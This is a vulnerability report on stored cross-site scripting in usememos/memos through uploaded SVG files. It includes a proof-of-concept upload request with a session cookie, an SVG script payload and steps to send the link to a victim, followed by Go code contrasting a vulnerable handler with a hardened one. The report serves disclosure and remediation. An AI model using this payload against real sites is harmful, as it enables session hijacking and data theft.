Cross-site scripting - Stored via upload of a `.svg` file in usememos/memos
Reported on
Dec 20th 2022
Description
When a user uploads a file with a `.svg` extension and the file is then opened directly by its URL, the server responds with `Content-Type: image/svg+xml` and no `Content-Disposition: attachment` or restrictive CSP. The browser therefore renders the SVG as a top-level document in the application's origin (rather than as a passive image), so any `<script>` element inside the file is executed as JavaScript with the victim's session.
Proof of Concept
```http
POST /api/resource HTTP/2
Host: demo.usememos.com
Cookie: memos_session=MTY3MTUzMjkzMXxEdi1EQkFFQ180UUFBUkFCRUFBQUhfLUVBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfOG89fDYqserGzpcgkE9G0qSf_dQ9Q8rHAMeM_lb9V-vZecyd
Content-Length: 462
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/json, text/plain, */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFu7Yl3xXBKej60Xw
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.usememos.com
Referer: https://demo.usememos.com/?text=1&shortcutId=1
Accept-Encoding: gzip, deflate

------WebKitFormBoundaryFu7Yl3xXBKej60Xw
Content-Disposition: form-data; name="file"; filename="xss.svg"
Content-Type: image/svg+xml

<svg width="100%" height="100%" viewBox="0 0 100 100"
     xmlns="http://www.w3.org/2000/svg">
  <circle cx="50" cy="50" r="45" fill="green"
          id="foo"/>
  <script type="text/javascript"></script>
</svg>
------WebKitFormBoundaryFu7Yl3xXBKej60Xw--
```
Steps to reproduce
- Prepare a file `xss.svg` whose `<svg>` element contains: `<script type="text/javascript">// <![CDATA[alert(window.origin);// ]]></script>`
- Upload `xss.svg` in Resource library -> Upload
- Copy the link to the uploaded file and send it to the victim; opening the link renders the SVG inline and runs the script in the application's origin
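To make the root cause and the fix concrete, the following Go example (added here; it is not code from the memos project, and the `/resource/` path, the in-memory `resources` store and the handler names are assumptions for illustration) contrasts a handler that serves uploads exactly as the description above says (`Content-Type: image/svg+xml`, nothing else) with a hardened one that forces active content types to download, adds `X-Content-Type-Options: nosniff`, and sends a sandboxing CSP so the file cannot run script even if it is opened inline. `rendersInline` automates the check from the steps to reproduce: given a response's headers, would a browser execute script from this resource?

```go
package main

import (
	"fmt"
	"mime"
	"net/http"
	"net/http/httptest"
	"path"
	"strings"
)

// Constructed sample upload: the payload from the report's reproduction steps.
const xssSVG = `<svg xmlns="http://www.w3.org/2000/svg">` +
	`<script type="text/javascript">// <![CDATA[alert(window.origin);// ]]></script></svg>`

// resources is a hypothetical stand-in for the upload store (not memos' own API).
// "pic.png" holds constructed bytes that merely look like a PNG header.
var resources = map[string][]byte{
	"xss.svg": []byte(xssSVG),
	"pic.png": {0x89, 'P', 'N', 'G', '\r', '\n', 0x1a, '\n'},
}

// vulnerableHandler mirrors the behaviour the report describes: the stored file
// is served with Content-Type image/svg+xml and no other protection, so a browser
// navigating to the URL executes the embedded <script> in the site's origin.
func vulnerableHandler(w http.ResponseWriter, r *http.Request) {
	body, ok := resources[path.Base(r.URL.Path)]
	if !ok {
		http.NotFound(w, r)
		return
	}
	w.Header().Set("Content-Type", "image/svg+xml")
	_, _ = w.Write(body)
}

// hardenedHandler does the same lookup but: active content (SVG/HTML/XML) is
// forced to download, sniffing is disabled, and a CSP with `sandbox` and no
// allowed sources blocks script execution even when the file is opened inline.
func hardenedHandler(w http.ResponseWriter, r *http.Request) {
	name := path.Base(r.URL.Path)
	body, ok := resources[name]
	if !ok {
		http.NotFound(w, r)
		return
	}
	ctype := contentTypeFor(name)
	h := w.Header()
	h.Set("Content-Type", ctype)
	h.Set("X-Content-Type-Options", "nosniff")
	h.Set("Content-Security-Policy", "default-src 'none'; sandbox")
	disposition := "inline"
	if isActiveContent(ctype) {
		disposition = "attachment"
	}
	// FormatMediaType quotes/escapes the filename, so a crafted name cannot inject header syntax.
	h.Set("Content-Disposition", mime.FormatMediaType(disposition, map[string]string{"filename": name}))
	_, _ = w.Write(body)
}

// contentTypeFor maps the stored filename's extension to a media type, falling
// back to application/octet-stream for anything unknown.
func contentTypeFor(name string) string {
	if ct := mime.TypeByExtension(strings.ToLower(path.Ext(name))); ct != "" {
		return ct
	}
	return "application/octet-stream"
}

// isActiveContent reports whether a media type is rendered by browsers as a
// scriptable document. Unparseable or empty types are treated as dangerous.
func isActiveContent(ctype string) bool {
	mt, _, err := mime.ParseMediaType(ctype)
	if err != nil {
		return true
	}
	switch mt {
	case "image/svg+xml", "text/html", "application/xhtml+xml", "text/xml", "application/xml":
		return true
	}
	return false
}

// rendersInline is the check from "Steps to reproduce": true when a browser
// opening a resource with these headers would run script from it.
func rendersInline(h http.Header) bool {
	if !isActiveContent(h.Get("Content-Type")) {
		return false
	}
	if strings.HasPrefix(strings.ToLower(h.Get("Content-Disposition")), "attachment") {
		return false
	}
	csp := h.Get("Content-Security-Policy")
	if strings.Contains(csp, "sandbox") || strings.Contains(csp, "script-src 'none'") {
		return false
	}
	return true
}

// probe issues an in-process GET for a stored resource and returns the response headers.
func probe(handler http.HandlerFunc, name string) http.Header {
	rec := httptest.NewRecorder()
	handler(rec, httptest.NewRequest(http.MethodGet, "/resource/"+name, nil))
	return rec.Result().Header
}

func main() {
	fmt.Println("vulnerable xss.svg renders inline:", rendersInline(probe(vulnerableHandler, "xss.svg")))
	fmt.Println("hardened   xss.svg renders inline:", rendersInline(probe(hardenedHandler, "xss.svg")))
	fmt.Println("hardened   pic.png disposition:   ", probe(hardenedHandler, "pic.png").Get("Content-Disposition"))
}
```

Forcing a download is the single change that stops this bug class; the CSP and `nosniff` are defence in depth for deployments that need SVGs displayed inline (e.g. referenced from `<img>`, where scripts never run anyway). Serving uploads from a separate, cookieless origin is the stronger option when it is available.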
Impact
An attacker who uploads a crafted SVG and gets a victim to open its link can execute arbitrary JavaScript in the context of the application's origin: steal the user's cookies, perform HTTP requests as the victim, read the content of same-origin pages, etc.